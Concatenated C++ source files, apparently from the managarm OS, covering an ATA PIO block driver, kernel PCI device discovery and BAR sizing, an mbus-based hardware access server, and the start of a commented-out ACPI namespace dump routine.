		status = cleared;

		assert(_inRequest);
		assert(!_requestQueue.empty());
		auto request = &_requestQueue.front();

		// PIO-transfer one 512-byte sector (256 16-bit words).
		auto dest = reinterpret_cast<uint8_t *>(request->buffer)
				+ request->sectorsRead * 512;
		for(int i = 0; i < 256; i++) {
			// TODO: Be careful with endianess here.
			uint16_t data = _ioSpace.load(regs::inData);
			memcpy(dest + 2 * i, &data, sizeof(uint16_t));
		}

		request->sectorsRead++;
		assert(request->sectorsRead <= request->numSectors);
		if(request->sectorsRead == request->numSectors) {
			if(logRequests)
				std::cout << "block-ata: Reading from " << request->sector
						<< " complete" << std::endl;
			request->promise.set_value();
			_requestQueue.pop();
			_inRequest = false;
			// Immediately issue the next queued request, if any.
			if(!_requestQueue.empty())
				_performRequest();
		}
	}
}))
// Queues a read of num_sectors 512-byte sectors starting at `sector` into
// `buffer` (which must stay valid until the returned future resolves). If the
// channel is idle, the request is issued immediately.
async::result<void> Controller::readSectors(uint64_t sector, void *buffer, size_t num_sectors) {
	_requestQueue.emplace();
	auto request = &_requestQueue.back();
	request->sector = sector;
	request->numSectors = num_sectors;
	request->sectorsRead = 0;
	request->buffer = buffer;

	// Obtain the future before _performRequest() so completion cannot race it.
	auto future = request->promise.async_get();
	if(!_inRequest)
		_performRequest();
	return future;
}
// Programs the front request of the queue into the device as an LBA48
// READ SECTORS EXT. The LBA48 protocol requires writing the *high* bytes of
// the sector count and LBA first, then the low bytes -- do not reorder.
void Controller::_performRequest() {
	assert(!_inRequest);
	_inRequest = true;

	assert(!_requestQueue.empty());
	auto request = &_requestQueue.front();
	if(logRequests)
		std::cout << "block-ata: Reading " << request->numSectors
				<< " sectors from " << request->sector << std::endl;

	// LBA48 addresses are limited to 48 bits.
	assert(!(request->sector & ~((size_t(1) << 48) - 1)));
	_ioSpace.store(regs::outDevice, kDeviceLba);
	// TODO: There should be a delay after drive selection.

	// High-order bytes first...
	_ioSpace.store(regs::outSectorCount, (request->numSectors >> 8) & 0xFF);
	_ioSpace.store(regs::outLba1, (request->sector >> 24) & 0xFF);
	_ioSpace.store(regs::outLba2, (request->sector >> 32) & 0xFF);
	_ioSpace.store(regs::outLba3, (request->sector >> 40) & 0xFF);

	// ...then the low-order bytes.
	_ioSpace.store(regs::outSectorCount, request->numSectors & 0xFF);
	_ioSpace.store(regs::outLba1, request->sector & 0xFF);
	_ioSpace.store(regs::outLba2, (request->sector >> 8) & 0xFF);
	_ioSpace.store(regs::outLba3, (request->sector >> 16) & 0xFF);

	_ioSpace.store(regs::outCommand, kCommandReadSectorsExt);
}
// Single driver-wide controller instance for the primary ATA channel.
Controller globalController;

// --------------------------------------------------------
// main() function
// --------------------------------------------------------

int main() {
	printf("block-ata: Starting driver\n");

	{
		// Associate all async operations started by run() with the global queue.
		async::queue_scope scope{helix::globalQueue()};
		globalController.run();
	}

	// Drive the event loop forever.
	helix::globalQueue()->run();
}
<file_sep>#ifndef POSIX_SUBSYSTEM_BLOCK_SYSTEM_HPP
#define POSIX_SUBSYSTEM_BLOCK_SYSTEM_HPP
#include <cofiber.hpp>
namespace block_subsystem {
cofiber::no_future run();
} // namespace block_subsystem
#endif // POSIX_SUBSYSTEM_BLOCK_SYSTEM_HPP
<file_sep>#ifndef POSIX_SUBSYSTEM_DRM_SYSTEM_HPP
#define POSIX_SUBSYSTEM_DRM_SYSTEM_HPP
#include <cofiber.hpp>
namespace drm_subsystem {
cofiber::no_future run();
} // namespace drm_subsystem
#endif // POSIX_SUBSYSTEM_DRM_SYSTEM_HPP
<file_sep>
#include <algorithm>
#include <frigg/debug.hpp>
#include <hw.frigg_pb.hpp>
#include <mbus.frigg_pb.hpp>
#include "../../arch/x86/pic.hpp"
#include "../../generic/fiber.hpp"
#include "../../generic/io.hpp"
#include "../../generic/kernel_heap.hpp"
#include "../../generic/service_helpers.hpp"
#include "../../generic/usermem.hpp"
#include "../boot-screen.hpp"
#include "pci.hpp"
namespace thor {
// TODO: Move this to a header file.
extern frigg::LazyInitializer<LaneHandle> mbusClient;
namespace pci {
frigg::LazyInitializer<frigg::Vector<frigg::SharedPtr<PciDevice>, KernelAlloc>> allDevices;
namespace {
// Accepts and serves one managarm::hw request on `lane` for the given PCI
// device. Returns false once the lane is closed (no more requests).
bool handleReq(LaneHandle lane, frigg::SharedPtr<PciDevice> device) {
	auto branch = fiberAccept(lane);
	if(!branch)
		return false;

	auto buffer = fiberRecv(branch);
	managarm::hw::CntRequest<KernelAlloc> req(*kernelAlloc);
	req.ParseFromArray(buffer.data(), buffer.size());

	if(req.req_type() == managarm::hw::CntReqType::GET_PCI_INFO) {
		// Report all capabilities and the six BARs of the device.
		managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
		resp.set_error(managarm::hw::Errors::SUCCESS);

		for(size_t i = 0; i < device->caps.size(); i++) {
			managarm::hw::PciCapability<KernelAlloc> msg(*kernelAlloc);
			msg.set_type(device->caps[i].type);
			msg.set_offset(device->caps[i].offset);
			msg.set_length(device->caps[i].length);
			resp.add_capabilities(std::move(msg));
		}

		for(size_t k = 0; k < 6; k++) {
			managarm::hw::PciBar<KernelAlloc> msg(*kernelAlloc);
			if(device->bars[k].type == PciDevice::kBarIo) {
				assert(device->bars[k].offset == 0);
				msg.set_io_type(managarm::hw::IoType::PORT);
				msg.set_address(device->bars[k].address);
				msg.set_length(device->bars[k].length);
			}else if(device->bars[k].type == PciDevice::kBarMemory) {
				msg.set_io_type(managarm::hw::IoType::MEMORY);
				msg.set_address(device->bars[k].address);
				msg.set_length(device->bars[k].length);
				msg.set_offset(device->bars[k].offset);
			}else{
				assert(device->bars[k].type == PciDevice::kBarNone);
				msg.set_io_type(managarm::hw::IoType::NO_BAR);
			}
			resp.add_bars(std::move(msg));
		}

		frigg::String<KernelAlloc> ser(*kernelAlloc);
		resp.SerializeToString(&ser);
		fiberSend(branch, ser.data(), ser.size());
	}else if(req.req_type() == managarm::hw::CntReqType::ACCESS_BAR) {
		// Hand out an I/O port or memory-view descriptor for the chosen BAR.
		auto index = req.index();

		AnyDescriptor descriptor;
		if(device->bars[index].type == PciDevice::kBarIo) {
			descriptor = IoDescriptor{device->bars[index].io};
		}else{
			assert(device->bars[index].type == PciDevice::kBarMemory);
			descriptor = MemoryViewDescriptor{device->bars[index].memory};
		}

		managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
		resp.set_error(managarm::hw::Errors::SUCCESS);

		frigg::String<KernelAlloc> ser(*kernelAlloc);
		resp.SerializeToString(&ser);
		fiberSend(branch, ser.data(), ser.size());
		fiberPushDescriptor(branch, descriptor);
	}else if(req.req_type() == managarm::hw::CntReqType::ACCESS_IRQ) {
		// Create a named IRQ object attached to the device's interrupt pin
		// and push it to the client.
		managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
		resp.set_error(managarm::hw::Errors::SUCCESS);

		assert(device->interrupt);
		auto object = frigg::makeShared<IrqObject>(*kernelAlloc,
				frigg::String<KernelAlloc>{*kernelAlloc, "pci-irq."}
				+ frigg::to_string(*kernelAlloc, device->bus)
				+ frigg::String<KernelAlloc>{*kernelAlloc, "-"}
				+ frigg::to_string(*kernelAlloc, device->slot)
				+ frigg::String<KernelAlloc>{*kernelAlloc, "-"}
				+ frigg::to_string(*kernelAlloc, device->function));
		IrqPin::attachSink(device->interrupt, object.get());

		frigg::String<KernelAlloc> ser(*kernelAlloc);
		resp.SerializeToString(&ser);
		fiberSend(branch, ser.data(), ser.size());
		fiberPushDescriptor(branch, IrqDescriptor{object});
	}else if(req.req_type() == managarm::hw::CntReqType::CLAIM_DEVICE) {
		// A driver takes over the device: stop the kernel's boot console
		// from scribbling over its framebuffer, if it had one.
		if(device->associatedScreen) {
			frigg::infoLogger() << "thor: Disabling screen associated with PCI device "
					<< device->bus << "." << device->slot << "." << device->function
					<< frigg::endLog;
			disableLogHandler(device->associatedScreen);
		}

		managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
		resp.set_error(managarm::hw::Errors::SUCCESS);

		frigg::String<KernelAlloc> ser(*kernelAlloc);
		resp.SerializeToString(&ser);
		fiberSend(branch, ser.data(), ser.size());
	}else if(req.req_type() == managarm::hw::CntReqType::BUSIRQ_ENABLE) {
		// Clear bit 10 (Interrupt Disable) of the PCI command register to
		// enable legacy INTx delivery.
		auto command = readPciHalf(device->bus, device->slot, device->function, kPciCommand);
		writePciHalf(device->bus, device->slot, device->function,
				kPciCommand, command & ~uint16_t{0x400});

		managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
		resp.set_error(managarm::hw::Errors::SUCCESS);

		frigg::String<KernelAlloc> ser(*kernelAlloc);
		resp.SerializeToString(&ser);
		fiberSend(branch, ser.data(), ser.size());
	}else if(req.req_type() == managarm::hw::CntReqType::LOAD_PCI_SPACE) {
		// Raw config-space read of 1, 2 or 4 bytes.
		// TODO: Perform some sanity checks on the offset.
		uint32_t word;
		if(req.size() == 1) {
			word = readPciByte(device->bus, device->slot, device->function, req.offset());
		}else if(req.size() == 2) {
			word = readPciHalf(device->bus, device->slot, device->function, req.offset());
		}else{
			assert(req.size() == 4);
			word = readPciWord(device->bus, device->slot, device->function, req.offset());
		}

		managarm::hw::SvrResponse<KernelAlloc> resp{*kernelAlloc};
		resp.set_error(managarm::hw::Errors::SUCCESS);
		resp.set_word(word);

		frigg::String<KernelAlloc> ser(*kernelAlloc);
		resp.SerializeToString(&ser);
		fiberSend(branch, ser.data(), ser.size());
	}else if(req.req_type() == managarm::hw::CntReqType::STORE_PCI_SPACE) {
		// Raw config-space write of 1, 2 or 4 bytes.
		// TODO: Perform some sanity checks on the offset.
		if(req.size() == 1) {
			writePciByte(device->bus, device->slot, device->function, req.offset(), req.word());
		}else if(req.size() == 2) {
			writePciHalf(device->bus, device->slot, device->function, req.offset(), req.word());
		}else{
			assert(req.size() == 4);
			writePciWord(device->bus, device->slot, device->function, req.offset(), req.word());
		}

		managarm::hw::SvrResponse<KernelAlloc> resp{*kernelAlloc};
		resp.set_error(managarm::hw::Errors::SUCCESS);

		frigg::String<KernelAlloc> ser(*kernelAlloc);
		resp.SerializeToString(&ser);
		fiberSend(branch, ser.data(), ser.size());
	}else if(req.req_type() == managarm::hw::CntReqType::LOAD_PCI_CAPABILITY) {
		// Config-space read relative to the start of the indexed capability.
		assert(req.index() < device->caps.size());

		// TODO: Perform some sanity checks on the offset.
		uint32_t word;
		if(req.size() == 1) {
			word = readPciByte(device->bus, device->slot, device->function,
					device->caps[req.index()].offset + req.offset());
		}else if(req.size() == 2) {
			word = readPciHalf(device->bus, device->slot, device->function,
					device->caps[req.index()].offset + req.offset());
		}else{
			assert(req.size() == 4);
			word = readPciWord(device->bus, device->slot, device->function,
					device->caps[req.index()].offset + req.offset());
		}

		managarm::hw::SvrResponse<KernelAlloc> resp{*kernelAlloc};
		resp.set_error(managarm::hw::Errors::SUCCESS);
		resp.set_word(word);

		frigg::String<KernelAlloc> ser(*kernelAlloc);
		resp.SerializeToString(&ser);
		fiberSend(branch, ser.data(), ser.size());
	}else if(req.req_type() == managarm::hw::CntReqType::GET_FB_INFO) {
		// Geometry of the boot framebuffer attached to this device (if any).
		auto fb = device->associatedFrameBuffer;
		assert(fb);

		managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
		resp.set_error(managarm::hw::Errors::SUCCESS);
		resp.set_fb_pitch(fb->pitch);
		resp.set_fb_width(fb->width);
		resp.set_fb_height(fb->height);
		resp.set_fb_bpp(fb->bpp);
		resp.set_fb_type(fb->type);

		frigg::String<KernelAlloc> ser(*kernelAlloc);
		resp.SerializeToString(&ser);
		fiberSend(branch, ser.data(), ser.size());
	}else if(req.req_type() == managarm::hw::CntReqType::ACCESS_FB_MEMORY) {
		// Push a memory-view descriptor of the framebuffer to the client.
		auto fb = device->associatedFrameBuffer;
		assert(fb);

		MemoryViewDescriptor descriptor{fb->memory};

		managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
		resp.set_error(managarm::hw::Errors::SUCCESS);

		frigg::String<KernelAlloc> ser(*kernelAlloc);
		resp.SerializeToString(&ser);
		fiberSend(branch, ser.data(), ser.size());
		fiberPushDescriptor(branch, descriptor);
	}else{
		// Unknown request type.
		managarm::hw::SvrResponse<KernelAlloc> resp(*kernelAlloc);
		resp.set_error(managarm::hw::Errors::ILLEGAL_REQUEST);

		frigg::String<KernelAlloc> ser(*kernelAlloc);
		resp.SerializeToString(&ser);
		fiberSend(branch, ser.data(), ser.size());
	}

	return true;
}
// ------------------------------------------------------------------------
// mbus object creation and management.
// ------------------------------------------------------------------------
// Registers the given PCI device with mbus: creates an mbus object whose
// properties describe the device (IDs encoded as hex strings) and returns
// the lane on which bind requests for the new object arrive.
LaneHandle createObject(LaneHandle mbus_lane, frigg::SharedPtr<PciDevice> device) {
	auto branch = fiberOffer(mbus_lane);

	// Each property is a (name, string value) pair; the trailing 16/width
	// arguments to frigg::to_string are presumably radix and zero-padded
	// width — confirm against frigg.
	managarm::mbus::Property<KernelAlloc> vendor_prop(*kernelAlloc);
	vendor_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "pci-vendor"));
	auto &vendor_item = vendor_prop.mutable_item().mutable_string_item();
	vendor_item.set_value(frigg::to_string(*kernelAlloc, device->vendor, 16, 4));

	managarm::mbus::Property<KernelAlloc> dev_prop(*kernelAlloc);
	dev_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "pci-device"));
	auto &dev_item = dev_prop.mutable_item().mutable_string_item();
	dev_item.set_value(frigg::to_string(*kernelAlloc, device->deviceId, 16, 4));

	managarm::mbus::Property<KernelAlloc> rev_prop(*kernelAlloc);
	rev_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "pci-revision"));
	auto &rev_item = rev_prop.mutable_item().mutable_string_item();
	rev_item.set_value(frigg::to_string(*kernelAlloc, device->revision, 16, 2));

	managarm::mbus::Property<KernelAlloc> class_prop(*kernelAlloc);
	class_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "pci-class"));
	auto &class_item = class_prop.mutable_item().mutable_string_item();
	class_item.set_value(frigg::to_string(*kernelAlloc, device->classCode, 16, 2));

	managarm::mbus::Property<KernelAlloc> subclass_prop(*kernelAlloc);
	subclass_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "pci-subclass"));
	auto &subclass_item = subclass_prop.mutable_item().mutable_string_item();
	subclass_item.set_value(frigg::to_string(*kernelAlloc, device->subClass, 16, 2));

	managarm::mbus::Property<KernelAlloc> if_prop(*kernelAlloc);
	if_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "pci-interface"));
	auto &if_item = if_prop.mutable_item().mutable_string_item();
	if_item.set_value(frigg::to_string(*kernelAlloc, device->interface, 16, 2));

	// NOTE(review): parent id 1 presumably refers to the mbus root object —
	// confirm against the mbus server.
	managarm::mbus::CntRequest<KernelAlloc> req(*kernelAlloc);
	req.set_req_type(managarm::mbus::CntReqType::CREATE_OBJECT);
	req.set_parent_id(1);
	req.add_properties(std::move(vendor_prop));
	req.add_properties(std::move(dev_prop));
	req.add_properties(std::move(rev_prop));
	req.add_properties(std::move(class_prop));
	req.add_properties(std::move(subclass_prop));
	req.add_properties(std::move(if_prop));

	// Devices that carry the boot framebuffer additionally get a generic
	// "class" = "framebuffer" property.
	if(device->associatedFrameBuffer) {
		managarm::mbus::Property<KernelAlloc> cls_prop(*kernelAlloc);
		cls_prop.set_name(frigg::String<KernelAlloc>(*kernelAlloc, "class"));
		auto &cls_item = cls_prop.mutable_item().mutable_string_item();
		cls_item.set_value(frigg::String<KernelAlloc>(*kernelAlloc, "framebuffer"));
		req.add_properties(std::move(cls_prop));
	}

	// Send the request, await the response and pull the lane of the
	// newly created object as a pushed descriptor.
	frigg::String<KernelAlloc> ser(*kernelAlloc);
	req.SerializeToString(&ser);
	fiberSend(branch, ser.data(), ser.size());

	auto buffer = fiberRecv(branch);
	managarm::mbus::SvrResponse<KernelAlloc> resp(*kernelAlloc);
	resp.ParseFromArray(buffer.data(), buffer.size());
	assert(resp.error() == managarm::mbus::Error::SUCCESS);

	auto descriptor = fiberPullDescriptor(branch);
	assert(descriptor.is<LaneDescriptor>());
	return descriptor.get<LaneDescriptor>().handle;
}
// Services a single BIND request on the device's mbus object lane:
// acknowledges the request, pushes one end of a fresh stream to the
// client and spawns a fiber that serves hw-protocol requests on the
// other end until handleReq() signals termination.
void handleBind(LaneHandle object_lane, frigg::SharedPtr<PciDevice> device) {
	auto branch = fiberAccept(object_lane);
	assert(branch);

	auto buffer = fiberRecv(branch);
	managarm::mbus::SvrRequest<KernelAlloc> req(*kernelAlloc);
	req.ParseFromArray(buffer.data(), buffer.size());
	assert(req.req_type() == managarm::mbus::SvrReqType::BIND);

	managarm::mbus::CntResponse<KernelAlloc> resp(*kernelAlloc);
	resp.set_error(managarm::mbus::Error::SUCCESS);

	frigg::String<KernelAlloc> ser(*kernelAlloc);
	resp.SerializeToString(&ser);
	fiberSend(branch, ser.data(), ser.size());

	// Lane 1 of the stream goes to the client; we keep lane 0.
	auto stream = createStream();
	fiberPushDescriptor(branch, LaneDescriptor{stream.get<1>()});

	// TODO: Do this in an own fiber.
	KernelFiber::run([lane = stream.get<0>(), device] () {
		while(true) {
			if(!handleReq(lane, device))
				break;
		}
	});
}
}
// Spawns a fiber that registers the device with mbus and then services
// bind requests on the resulting object lane forever.
void runDevice(frigg::SharedPtr<PciDevice> device) {
	KernelFiber::run([device] {
		auto object_lane = createObject(*mbusClient, device);
		for(;;)
			handleBind(object_lane, device);
	});
}
// --------------------------------------------------------
// Discovery functionality
// --------------------------------------------------------
// Computes the size of a PCI BAR from the address mask that the device
// reports after all-ones are written to the BAR register: the length is
// 2^n where n is the number of low address bits the device ignores
// (i.e. the trailing zero bits of the mask).
size_t computeBarLength(uintptr_t mask) {
	static_assert(sizeof(long) == 8, "Fix builtin usage");
	static_assert(sizeof(uintptr_t) == 8, "Fix builtin usage");
	assert(mask);

	size_t length_bits = __builtin_ctzl(mask);
	// TODO: Sanity-check that the decoded address bits are contiguous, i.e.
	// __builtin_popcountl(mask) == (64 - __builtin_clzl(mask)) - length_bits.
	// (Previously computed into an unused local; some devices may violate it.)
	return size_t(1) << length_bits;
}
//FIXME: std::queue<unsigned int> enumerationQueue;
// Looks up the IRQ pin that the routing table assigns to the given
// (slot, interrupt index) pair. Panics if no route exists.
IrqPin *resolveRoute(const RoutingInfo &info, unsigned int slot, IrqIndex index) {
	for(const auto &route : info) {
		if(route.slot != slot || route.index != index)
			continue;
		assert(route.pin);
		return route.pin;
	}
	assert(!"resolveRoute(): no matching route");
	return nullptr;
}
void checkPciFunction(uint32_t bus, uint32_t slot, uint32_t function,
const RoutingInfo &routing) {
uint16_t vendor = readPciHalf(bus, slot, function, kPciVendor);
if(vendor == 0xFFFF)
return;
uint8_t header_type = readPciByte(bus, slot, function, kPciHeaderType);
if((header_type & 0x7F) == 0) {
frigg::infoLogger() << " Function " << function << ": Device";
}else if((header_type & 0x7F) == 1) {
uint8_t secondary = readPciByte(bus, slot, function, kPciBridgeSecondary);
frigg::infoLogger() << " Function " << function
<< ": PCI-to-PCI bridge to bus " << (int)secondary;
//FIXME: enumerationQueue.push(secondary);
}else{
frigg::infoLogger() << " Function " << function
<< ": Unexpected PCI header type " << (header_type & 0x7F);
}
auto command = readPciHalf(bus, slot, function, kPciCommand);
if(command & 0x01)
frigg::infoLogger() << " (Decodes IO)";
if(command & 0x02)
frigg::infoLogger() << " (Decodes Memory)";
if(command & 0x04)
frigg::infoLogger() << " (Busmaster)";
if(command & 0x400)
frigg::infoLogger() << " (IRQs masked)";
frigg::infoLogger() << frigg::endLog;
writePciHalf(bus, slot, function, kPciCommand, command | 0x400);
auto device_id = readPciHalf(bus, slot, function, kPciDevice);
auto revision = readPciByte(bus, slot, function, kPciRevision);
auto class_code = readPciByte(bus, slot, function, kPciClassCode);
auto sub_class = readPciByte(bus, slot, function, kPciSubClass);
auto interface = readPciByte(bus, slot, function, kPciInterface);
frigg::infoLogger() << " Vendor/device: " << frigg::logHex(vendor)
<< "." << frigg::logHex(device_id) << "." << frigg::logHex(revision)
<< ", class: " << frigg::logHex(class_code)
<< "." << frigg::logHex(sub_class)
<< "." << frigg::logHex(interface) << frigg::endLog;
if((header_type & 0x7F) == 0) {
// uint16_t subsystem_vendor = readPciHalf(bus, slot, function, kPciRegularSubsystemVendor);
// uint16_t subsystem_device = readPciHalf(bus, slot, function, kPciRegularSubsystemDevice);
// frigg::infoLogger() << " Subsystem vendor: 0x" << frigg::logHex(subsystem_vendor)
// << ", device: 0x" << frigg::logHex(subsystem_device) << frigg::endLog;
auto status = readPciHalf(bus, slot, function, kPciStatus);
if(status & 0x08)
frigg::infoLogger() << "\e[35m IRQ is asserted!\e[39m" << frigg::endLog;
auto device = frigg::makeShared<PciDevice>(*kernelAlloc, bus, slot, function,
vendor, device_id, revision, class_code, sub_class, interface);
// Find all capabilities.
if(status & 0x10) {
// The bottom two bits of each capability offset must be masked!
uint8_t offset = readPciByte(bus, slot, function, kPciRegularCapabilities) & 0xFC;
while(offset != 0) {
auto type = readPciByte(bus, slot, function, offset);
auto name = nameOfCapability(type);
if(name) {
frigg::infoLogger() << " " << name << " capability"
<< frigg::endLog;
}else{
frigg::infoLogger() << " Capability of type 0x"
<< frigg::logHex((int)type) << frigg::endLog;
}
// TODO:
size_t size = -1;
if(type == 0x09)
size = readPciByte(bus, slot, function, offset + 2);
device->caps.push({type, offset, size});
uint8_t successor = readPciByte(bus, slot, function, offset + 1);
offset = successor & 0xFC;
}
}
// Determine the BARs
for(int i = 0; i < 6; i++) {
uint32_t offset = kPciRegularBar0 + i * 4;
uint32_t bar = readPciWord(bus, slot, function, offset);
if(bar == 0)
continue;
if((bar & 1) != 0) {
uintptr_t address = bar & 0xFFFFFFFC;
// write all 1s to the BAR and read it back to determine this its length.
writePciWord(bus, slot, function, offset, 0xFFFFFFFF);
uint32_t mask = readPciWord(bus, slot, function, offset) & 0xFFFFFFFC;
writePciWord(bus, slot, function, offset, bar);
auto length = computeBarLength(mask);
device->bars[i].type = PciDevice::kBarIo;
device->bars[i].address = address;
device->bars[i].length = length;
device->bars[i].io = frigg::makeShared<IoSpace>(*kernelAlloc);
for(size_t p = 0; p < length; ++p)
device->bars[i].io->addPort(address + p);
device->bars[i].offset = 0;
frigg::infoLogger() << " I/O space BAR #" << i
<< " at 0x" << frigg::logHex(address)
<< ", length: " << length << " ports" << frigg::endLog;
}else if(((bar >> 1) & 3) == 0) {
uint32_t address = bar & 0xFFFFFFF0;
// Write all 1s to the BAR and read it back to determine this its length.
writePciWord(bus, slot, function, offset, 0xFFFFFFFF);
uint32_t mask = readPciWord(bus, slot, function, offset) & 0xFFFFFFF0;
writePciWord(bus, slot, function, offset, bar);
auto length = computeBarLength(mask);
device->bars[i].type = PciDevice::kBarMemory;
device->bars[i].address = address;
device->bars[i].length = length;
auto offset = address & (kPageSize - 1);
device->bars[i].memory = frigg::makeShared<HardwareMemory>(*kernelAlloc,
address & ~(kPageSize - 1),
(length + offset + (kPageSize - 1)) & ~(kPageSize - 1),
CachingMode::null);
device->bars[i].offset = offset;
frigg::infoLogger() << " 32-bit memory BAR #" << i
<< " at 0x" << frigg::logHex(address)
<< ", length: " << length << " bytes" << frigg::endLog;
}else if(((bar >> 1) & 3) == 2) {
assert(i < 5); // Otherwise there is no next bar.
auto high = readPciWord(bus, slot, function, offset + 4);;
auto address = (uint64_t{high} << 32) | (bar & 0xFFFFFFF0);
// Write all 1s to the BAR and read it back to determine this its length.
writePciWord(bus, slot, function, offset, 0xFFFFFFFF);
writePciWord(bus, slot, function, offset + 4, 0xFFFFFFFF);
uint32_t mask = (uint64_t{readPciWord(bus, slot, function, offset + 4)} << 32)
| (readPciWord(bus, slot, function, offset) & 0xFFFFFFF0);
writePciWord(bus, slot, function, offset, bar);
writePciWord(bus, slot, function, offset + 4, high);
auto length = computeBarLength(mask);
device->bars[i].type = PciDevice::kBarMemory;
device->bars[i].address = address;
device->bars[i].length = length;
auto offset = address & (kPageSize - 1);
device->bars[i].memory = frigg::makeShared<HardwareMemory>(*kernelAlloc,
address & ~(kPageSize - 1),
(length + offset + (kPageSize - 1)) & ~(kPageSize - 1),
CachingMode::null);
device->bars[i].offset = offset;
frigg::infoLogger() << " 64-bit memory BAR #" << i
<< " at 0x" << frigg::logHex(address)
<< ", length: " << length << " bytes" << frigg::endLog;
i++;
}else{
assert(!"Unexpected BAR type");
}
}
auto irq_index = static_cast<IrqIndex>(readPciByte(bus, slot, function,
kPciRegularInterruptPin));
if(irq_index != IrqIndex::null) {
auto irq_pin = resolveRoute(routing, slot, irq_index);
frigg::infoLogger() << " Interrupt: "
<< nameOf(irq_index)
<< " (routed to " << irq_pin->name() << ")" << frigg::endLog;
device->interrupt = irq_pin;
}
allDevices->push(device);
}
// TODO: This should probably be moved somewhere else.
if(class_code == 0x0C && sub_class == 0x03 && interface == 0x00) {
frigg::infoLogger() << " \e[32mDisabling UHCI SMI generation!\e[39m"
<< frigg::endLog;
writePciHalf(bus, slot, function, 0xC0, 0x2000);
}
}
void checkPciFunction(uint32_t bus, uint32_t slot, uint32_t function,
const RoutingInfo &routing);
// Probes one device slot on a bus. Multi-function devices (header type
// bit 7 set) get all eight functions scanned; otherwise only function 0.
void checkPciDevice(uint32_t bus, uint32_t slot,
		const RoutingInfo &routing) {
	// Vendor ID 0xFFFF means nothing responds at this slot.
	auto vendor = readPciHalf(bus, slot, 0, kPciVendor);
	if(vendor == 0xFFFF)
		return;

	frigg::infoLogger() << " Bus: " << bus << ", slot " << slot << frigg::endLog;

	auto header_type = readPciByte(bus, slot, 0, kPciHeaderType);
	if(!(header_type & 0x80)) {
		checkPciFunction(bus, slot, 0, routing);
		return;
	}
	for(uint32_t function = 0; function < 8; function++)
		checkPciFunction(bus, slot, function, routing);
}
// Probes each of the 32 possible device slots on the given bus.
void checkPciBus(uint32_t bus, const RoutingInfo &routing) {
	uint32_t slot = 0;
	while(slot < 32) {
		checkPciDevice(bus, slot, routing);
		++slot;
	}
}
// Entry point of PCI discovery: scans the root bus and records every
// function that responds into allDevices.
void pciDiscover(const RoutingInfo &routing) {
	frigg::infoLogger() << "thor: Discovering PCI devices" << frigg::endLog;
	allDevices.initialize(*kernelAlloc);
	// TODO: Recursively enumerate busses behind PCI-to-PCI bridges,
	// roughly as follows (see the enumerationQueue FIXME above):
	/* enumerationQueue.push(0);
	while(!enumerationQueue.empty()) {
		auto bus = enumerationQueue.front();
		enumerationQueue.pop();
		checkPciBus(bus);
	}*/
	checkPciBus(0, routing);
}
// Spawns a management fiber for each device found by pciDiscover().
void runAllDevices() {
	for(auto &device : *allDevices)
		runDevice(device);
}
} } // namespace thor::pci
<file_sep>
#include <algorithm>
#include <frigg/debug.hpp>
#include <frigg/initializer.hpp>
#include <frigg/optional.hpp>
#include <frigg/string.hpp>
#include <frigg/vector.hpp>
#include "../../arch/x86/cpu.hpp"
#include "../../arch/x86/hpet.hpp"
#include "../../arch/x86/pic.hpp"
#include "../../generic/kernel_heap.hpp"
#include "../../system/pci/pci.hpp"
#include "pm-interface.hpp"
extern "C" {
#include <acpi.h>
}
/*
namespace acpi {
};
bool hasChildren(ACPI_HANDLE parent) {
ACPI_HANDLE child;
ACPI_STATUS status = AcpiGetNextObject(ACPI_TYPE_ANY, parent, nullptr, &child);
if(status == AE_NOT_FOUND)
return false;
ACPICA_CHECK(status);
return true;
}
void dumpNamespace(ACPI_HANDLE object, int depth = 0) {
ACPI_OBJECT_TYPE type;
ACPICA_CHECK(AcpiGetType(object, &type));
char segment[5];
ACPI_BUFFER name_buffer;
name_buffer.Pointer = segment;
name_buffer.Length = 5;
ACPICA_CHECK(AcpiGetName(object, ACPI_SINGLE_NAME, &name_buffer));
auto indent = [&] {
for(int i = 0; i < depth; i++)
std::cout << " ";
};
auto typeString = [] (ACPI_OBJECT_TYPE type) -> std::string {
if(type == ACPI_TYPE_INTEGER) {
return "Integer";
}else if(type == ACPI_TYPE_STRING) {
return "String";
}else if(type == ACPI_TYPE_BUFFER) {
return "Buffer";
}else if(type == ACPI_TYPE_PACKAGE) {
return "Package";
}else if(type == ACPI_TYPE_DEVICE) {
return "Device";
}else if(type == ACPI_TYPE_METHOD) {
return "Method";
}else if(type == ACPI_TYPE_MUTEX) {
return "Mutex";
}else if(type == ACPI_TYPE_REGION) {
return "Region";
}else if(type == ACPI_TYPE_PROCESSOR) {
return "Processor";
}else if(type == ACPI_TYPE_LOCAL_SCOPE) {
return "Scope";
}else{
std::stringstream s;
s << "[Type 0x" << std::hex << type << std::dec << "]";
return s.str();
}
};
indent();
std::cout << segment << ": " << typeString(type);
if(type == ACPI_TYPE_INTEGER) {
ACPI_OBJECT result;
ACPI_BUFFER buffer;
buffer.Pointer = &result;
buffer.Length = sizeof(ACPI_OBJECT);
ACPICA_CHECK(AcpiEvaluateObjectTyped(object, nullptr,
nullptr, &buffer, ACPI_TYPE_INTEGER));
std::cout << " 0x" << std::hex << result.Integer.Value << std::dec;
}
std::cout << std::endl;
if(type == ACPI_TYPE_DEVICE) {
ACPI_DEVICE_INFO *info;
ACPICA_CHECK(AcpiGetObjectInfo(object, &info));
if(info->HardwareId.String) {
indent();
std::cout << "* Hardware ID: " << info->HardwareId.String << std::endl;
}
ACPI_FREE(info);
}
if(hasChild(object, "_CRS")) {
walkResources(object, "_CRS", [&] (ACPI_RESOURCE *r) {
if(r->Type == ACPI_RESOURCE_TYPE_IRQ) {
indent();
std::cout << "* Resource: Irq (";
for(uint8_t i = 0; i < r->Data.Irq.InterruptCount; i++) {
if(i)
std::cout << ", ";
